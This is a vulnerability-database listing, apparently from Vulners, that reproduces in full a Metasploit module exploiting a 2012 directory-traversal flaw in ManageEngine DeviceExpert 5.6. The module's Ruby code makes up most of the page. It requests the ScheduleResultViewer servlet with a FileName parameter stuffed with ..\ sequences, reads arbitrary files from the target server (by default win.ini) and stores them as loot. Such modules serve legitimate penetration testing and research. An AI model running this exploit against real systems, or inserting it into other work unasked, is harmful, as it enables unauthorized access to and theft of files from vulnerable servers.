Lucene search

K

ManageEngine DeviceExpert 5.6 ScheduleResultViewer FileName Traversal

🗓️ 29 Oct 2012 17:07:25Reported by rgod, sinn3r <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 5 Views

ManageEngine DeviceExpert 5.6 ScheduleResultViewer FileName Traversal exploi

Show more
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ManageEngine DeviceExpert 5.6 ScheduleResultViewer FileName Traversal',
      'Description'    => %q{
          This module exploits a directory traversal vulnerability found in ManageEngine
        DeviceExpert's ScheduleResultViewer Servlet.  This is done by using
        "..\..\..\..\..\..\..\..\..\..\" in the path in order to retrieve a file on a
        vulnerable machine.  Please note that the SSL option is required in order to send
        HTTP requests.
      },
      'References'     =>
        [
          [ 'OSVDB', '80262']
        ],
      'Author'         =>
        [
          'rgod',   #Discovery
          'sinn3r'
        ],
      'License'        => MSF_LICENSE,
      'DisclosureDate' => '2012-03-18'
    ))

    register_options(
      [
        Opt::RPORT(6060),
        OptBool.new('SSL',   [true, 'Use SSL', true]),
        OptString.new('FILEPATH', [true, 'The name of the file to download', 'windows\\win.ini'])
      ])
  end

  def run_host(ip)
    traverse = "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\"
    filename = datastore['FILEPATH']

    res = send_request_raw({
      'uri' => "/scheduleresult.de",
      'method' => 'GET'
    }, 25)

    if res && res.code != 200
      print_error("Target is not ManageEngine DeviceExpert")
      return
    end

    res = send_request_raw({
      'uri' => "/scheduleresult.de/?FileName=#{traverse}#{filename}",
      'method' => 'GET'
    }, 25)

    if res
      case res.code
      when 200
        print_status("#{ip}:#{rport} returns: #{res.code.to_s}")
      when 404
        print_error("#{ip}:#{rport} - file not found")
        return
      end
    else
      print_error("Unable to communicate with #{ip}:#{rport}")
      return
    end

    if res.body.empty?
      print_error("#{ip}:#{rport} - no file downloaded (empty)")
    else
      fname = File.basename(datastore['FILEPATH'])
      path = store_loot(
        'manageengine.http',
        'application/octet-stream',
        ip,
        res.body,
        fname)

      print_good("#{ip}:#{rport} - File saved in: #{path}")
    end
  end
end

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
29 Oct 2012 17:25Current
6.9Medium risk
Vulners AI Score6.9
5
.json
Report